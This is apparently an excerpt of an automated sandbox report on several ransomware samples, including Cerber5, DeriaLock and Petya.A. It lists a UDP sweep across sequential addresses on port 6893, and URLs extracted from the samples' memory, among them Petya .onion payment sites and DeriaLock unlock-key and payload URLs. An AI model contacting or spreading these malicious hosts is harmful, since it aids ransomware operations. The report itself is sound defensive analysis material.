        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.175:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.176:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.177:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.178:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.179:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.180:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.181:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.182:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.183:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.184:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.185:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.186:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.187:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.188:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.189:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.190:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.191:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.192:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.193:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.194:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.195:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.196:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.197:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.198:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.199:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.200:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.201:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.202:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.203:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.204:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.205:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.206:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.207:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.208:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.209:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.210:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.211:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.212:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.213:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.214:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.215:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.216:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.217:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.218:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.219:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.222:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.223:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.220:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.224:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.221:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.225:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.227:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.226:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.228:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.229:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.230:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.231:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.232:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.233:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.234:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.235:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.236:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.237:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.238:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.239:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.240:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.241:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.242:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.243:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.244:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.245:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.246:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.247:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.248:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.249:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.250:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.251:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.252:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.253:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.254:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.0:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.1:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.2:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.176.255:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.3:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.4:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.5:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.6:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.7:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.8:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.9:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.11:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.12:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.10:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.13:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.14:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.15:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.16:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.17:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.18:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.19:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.20:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.21:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.22:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.23:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.24:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.25:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.26:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.27:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.28:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.29:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.30:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.31:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.32:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.33:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.34:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.35:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.36:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.38:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.39:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.37:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.40:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.41:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.42:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.43:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.44:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.45:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.46:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.47:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.48:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.49:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.50:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.51:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.52:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.53:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.54:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.55:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.57:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.56:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.58:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.60:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.61:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.59:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.62:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.63:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.64:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.65:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.66:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.67:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.68:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.71:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.70:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.72:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.69:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.75:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.73:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.76:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.77:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.78:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.79:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.74:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.80:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.81:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.82:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.83:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.85:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.86:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.87:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.84:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.88:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.89:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.90:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.92:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.91:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.93:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.94:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.95:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.96:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.97:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.98:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.99:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.100:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.101:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.102:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.103:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.104:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.105:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.106:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.107:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.108:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.109:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.110:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.111:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.112:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.113:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.114:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.115:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.116:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.117:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.118:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.119:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.120:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.121:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.122:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.123:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.124:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.125:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.126:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.127:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.128:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.129:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.130:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.131:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.132:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.133:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.134:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.135:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.136:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.137:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.138:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.139:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.140:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.141:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.142:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.143:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.144:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.145:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.146:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.147:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.148:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.149:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.150:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.151:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.152:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.154:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.153:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.155:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.156:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.157:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.158:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.159:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.160:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.161:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.162:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.163:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.165:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.166:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.167:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.169:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.170:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.164:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.171:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.172:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.173:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.168:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.174:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.175:6893
        Source: global trafficUDP traffic: 192.168.2.4:58566 -> 87.98.177.176:6893
        Source: rundll32.exe, 00000004.00000002.360753578.00000000032CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.364020758.00000000033AC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.363964013.00000000033A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/
        Source: rundll32.exe, 00000004.00000002.363964013.00000000033A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/Ea
        Source: Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.blo
        Source: Endermanch@DeriaLock.exe, 0000000B.00000000.335032516.0000000000506000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: http://arizonacode.bplaced.net/HF/SystemLocker/UNLOCKKEYS/
        Source: Endermanch@DeriaLock.exe, 0000000B.00000000.335032516.0000000000506000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: http://arizonacode.bplaced.net/HF/SystemLocker/UNLOCKKEYS/LOGON.exe
        Source: Endermanch@DeriaLock.exe, 0000000B.00000000.335032516.0000000000506000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: http://arizonacode.bplaced.net/HF/SystemLocker/unlock-everybody.txt
        Source: Endermanch@Cerber5.exe, 00000005.00000002.393125569.0000000006466000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://btc.blo
        Source: Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
        Source: Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
        Source: Error file remover.msi.53.drString found in binary or memory: http://collect.installeranalytics.com7
        Source: Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
        Source: Endermanch@Cerber5.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
        Source: Endermanch@Cerber5.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
        Source: rundll32.exe, 00000004.00000002.360753578.00000000032CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.347913498.0000000003363000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.329448544.000000000334C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.363121457.000000000335A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.342307244.0000000003363000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.330844092.0000000003363000.00000004.00000020.00020000.00000000.sdmp, Error file remover.msi.53.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
        Source: Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
        Source: Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
        Source: Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
        Source: Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
        Source: rundll32.exe, 00000004.00000003.347913498.0000000003363000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.329448544.000000000334C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.363121457.000000000335A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.342307244.0000000003363000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.330844092.0000000003363000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.342061025.0000000004AB1000.00000004.00000800.00020000.00000000.sdmp, dispci.exe, 00000023.00000000.361792581.0000000000B0E000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: http://diskcryptor.net/
        Source: Endermanch@DeriaLock.exe, 0000000B.00000003.356383984.000000000595B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fontfabrik.com
        Source: Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: Endermanch@FakeAdwCleaner.exe.0.dr, Endermanch@Cerber5.exe.0.drString found in binary or memory: http://ocsp.comodoca.com0
        Source: Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
        Source: Endermanch@FakeAdwCleaner.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
        Source: rundll32.exe, 00000004.00000002.360753578.00000000032CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.347913498.0000000003363000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.329448544.000000000334C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.363121457.000000000335A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.342307244.0000000003363000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.330844092.0000000003363000.00000004.00000020.00020000.00000000.sdmp, Error file remover.msi.53.drString found in binary or memory: http://ocsp.thawte.com0
        Source: Endermanch@Petya.A.exe, 0000002C.00000002.555456334.000000000041B000.00000040.00000001.01000000.00000015.sdmpString found in binary or memory: http://petya37h5tbhyvki.onion/
        Source: Endermanch@Petya.A.exe, 0000002C.00000002.532115532.000000000019C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://petya37h5tbhyvki.onion/SVjaQ4
        Source: Endermanch@Petya.A.exe, 0000002C.00000002.555456334.000000000041B000.00000040.00000001.01000000.00000015.sdmpString found in binary or memory: http://petya5koahtsf7sv.onion/
        Source: Endermanch@Petya.A.exe, 0000002C.00000002.532115532.000000000019C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://petya5koahtsf7sv.onion/SVjaQ4
        Source: Endermanch@Petya.A.exe, 0000002C.00000002.532115532.000000000019C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://petya5koahtsf7sv.onion/SVjaQ4d7Rk9FsfgkEC2LPDrns8goKfy17iHg3zTmFyKoqRitYFnn2AsccXJiuzhh1VLp9q
        Source: Endermanch@Petya.A.exe, 0000002C.00000002.555456334.000000000041B000.00000040.00000001.01000000.00000015.sdmpString found in binary or memory: http://petya5koahtsf7sv.onion/http://petya37h5tbhyvki.onion/SeShutdownPrivilegeNtRaiseHardErrorNTDLL
        Source: Endermanch@Krotten.exe.0.drString found in binary or memory: http://poetry.rotten.com/lightning/
        Source: rundll32.exe, 00000004.00000002.360753578.00000000032CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rb.symcb.com/rb.crl0W
        Source: rundll32.exe, 00000004.00000002.360753578.00000000032CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rb.symcb.com/rb.crt0
        Source: rundll32.exe, 00000004.00000002.360753578.00000000032CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://rb.symcd.com0&
        Source: rundll32.exe, 00000004.00000002.360753578.00000000032CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
        Source: rundll32.exe, 00000004.00000002.360753578.00000000032CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com0
        Source: rundll32.exe, 00000004.00000002.360753578.00000000032CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
        Source: rundll32.exe, 00000004.00000002.360753578.00000000032CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crl0W
        Source: rundll32.exe, 00000004.00000002.360753578.00000000032CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crt0
        Source: rundll32.exe, 00000004.00000002.360753578.00000000032CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sf.symcd.com0&
        Source: Error file remover.msi.53.drString found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
        Source: Error file remover.msi.53.drString found in binary or memory: http://t2.symcb.com0
        Source: Error file remover.msi.53.drString found in binary or memory: http://tl.symcb.com/tl.crl0
        Source: Error file remover.msi.53.drString found in binary or memory: http://tl.symcb.com/tl.crt0
        Source: Error file remover.msi.53.drString found in binary or memory: http://tl.symcd.com0&
